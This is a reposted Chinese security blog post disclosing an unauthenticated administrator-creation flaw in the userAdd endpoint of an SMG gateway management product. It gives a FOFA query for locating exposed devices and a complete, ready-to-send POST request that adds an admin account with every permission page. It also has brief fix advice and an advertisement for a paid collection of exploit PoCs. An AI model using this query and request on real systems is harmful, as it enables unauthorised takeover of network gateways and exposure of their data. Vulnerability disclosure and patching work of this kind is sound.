2026-05-06 07:00:04 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文披露杭州新威数字信息SMG网关管理软件8-1-1userAdd接口存在未授权任意用户创建漏洞，攻击者可利用此漏洞直接添加管理员账户接管系统后台。文档提供完整的FOFA搜索语法、漏洞复现的POST请求数据包及修复建议，并强调该漏洞可能导致敏感信息泄露，建议通过限制接口访问权限或升级系统进行防护。 综合评分： 72 文章分类： 漏洞分析,WEB安全,漏洞预警,解决方案,安全工具

cover_image

杭州新威数字信息-SMG网关管理软件8-1-1userAdd-任意用户新增

原创

北雪网络安全北雪网络安全

北雪网络安全

2026年4月29日 13:13 山东

在小说阅读器读本章

去阅读

本文章所描述的内容仅供网络安全学习使用，任何人不允许学到技术内容进行非法系统测试，作者不对任何学习文章并进行非法操作的行为负责，由本人自己承担后果，本文章仅供技术学习。

网络安全学习知识库每日添加最新漏洞并提供python与 nuclei 批量探测脚本：https://pc.fenchuan8.com/#/index?forum=110296

搜索引擎

Fofa：body=”text ml10 mr20″ && (title=”网关管理软件” || title=”Gateway Management”)

漏洞复现

漏洞概述：三汇网关管理系统 8-1-1userAdd 接口处存在任意用户创建漏洞，未经身份验证的远程攻击者可以利用此漏洞创建管理员账户，从而接管系统后台，造成信息泄露，导致系统处于极不安全的状态

POST&nbsp;/en/8-1-1userAdd.php&nbsp;HTTP/1.1Content-Type:&nbsp;application/x-www-form-urlencodedHost:&nbsp;your-ip
user_name=ABC090&user_token=&user_password=aklsd11231kkkJ!&user_authorization=1&page%5B%5D=1-1sysinfo&page%5B%5D=1-4chstatus&page%5B%5D=1-3callcount&page%5B%5D=1-6sipmsgcount&page%5B%5D=1-5guideset&page%5B%5D=2-1sipset&page%5B%5D=2-3sipcompatibility&page%5B%5D=2-4natset&page%5B%5D=2-2mediaset&page%5B%5D=3-1-1FXSset&page%5B%5D=3-8tone&page%5B%5D=3-12callsound&page%5B%5D=3-10dtmf&page%5B%5D=3-9ringnum&page%5B%5D=3-2faxpara&page%5B%5D=3-3funkey&page%5B%5D=3-4dialrules&page%5B%5D=3-5dialtimeout&page%5B%5D=3-7tip&page%5B%5D=3-11ringback&page%5B%5D=3-8qos&page%5B%5D=3-14actionurl&page%5B%5D=3-17ModuleArea&page%5B%5D=3-16vpnset&page%5B%5D=8-1user&page%5B%5D=4-1fxsset&page%5B%5D=4-1fxsadvance&page%5B%5D=4-2groupportset&page%5B%5D=5-4RouteParameter&page%5B%5D=5-1routerulesIP2Tel&page%5B%5D=5-2routerulesTel2IP&page%5B%5D=7-1manipulateSrcIP2Tel&page%5B%5D=7-2manipulateDstIP2Tel&page%5B%5D=7-3manipulateSrcTel2IP&page%5B%5D=7-4manipulateDstTel2IP&page%5B%5D=6-16manageconfig&page%5B%5D=6-21configfile&page%5B%5D=6-1netset&page%5B%5D=6-3softupdate&page%5B%5D=6-15pcap&page%5B%5D=6-17calllog&page%5B%5D=6-19operatelog&page%5B%5D=6-6backup&page%5B%5D=6-7reset&page%5B%5D=6-13systemmonitor&page%5B%5D=6-22certificates&page%5B%5D=6-23configoptimize&page%5B%5D=6-10snmp&page%5B%5D=6-10tr069&page%5B%5D=6-20iptables&page%5B%5D=6-11ping&page%5B%5D=6-22DNSTest&page%5B%5D=6-12trace&page%5B%5D=6-5modifypwd&page%5B%5D=6-8reboot&save=Save

自查工具

修复建议

1、关闭互联网暴露面或接口设置访问权限

2、升级至安全版本

内部圈子

🛠️ 【知名漏洞实战圈，纯干货】🛠️

还在找公开漏洞POC而烦恼？还在为漏洞不会验证而发愁？还在为发现不了漏洞而自卑？这里漏洞圈子解决你的困惑！目前已更新poc数量2500+

🎯 适用场景

▫️渗透测试▫️企业漏洞自查▫️攻防演练▫️安全服务▫️合规运营****

⚠️ 重要声明：

▫️仅限合法授权测试，严禁违规使用

▫️虚拟资源服务，购买后不接受任何形式退款

▫️付款前请评估需求，慎重考虑

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：北雪网络安全北雪网络安全北雪网络安全《杭州新威数字信息-SMG网关管理软件8-1-1userAdd-任意用户新增》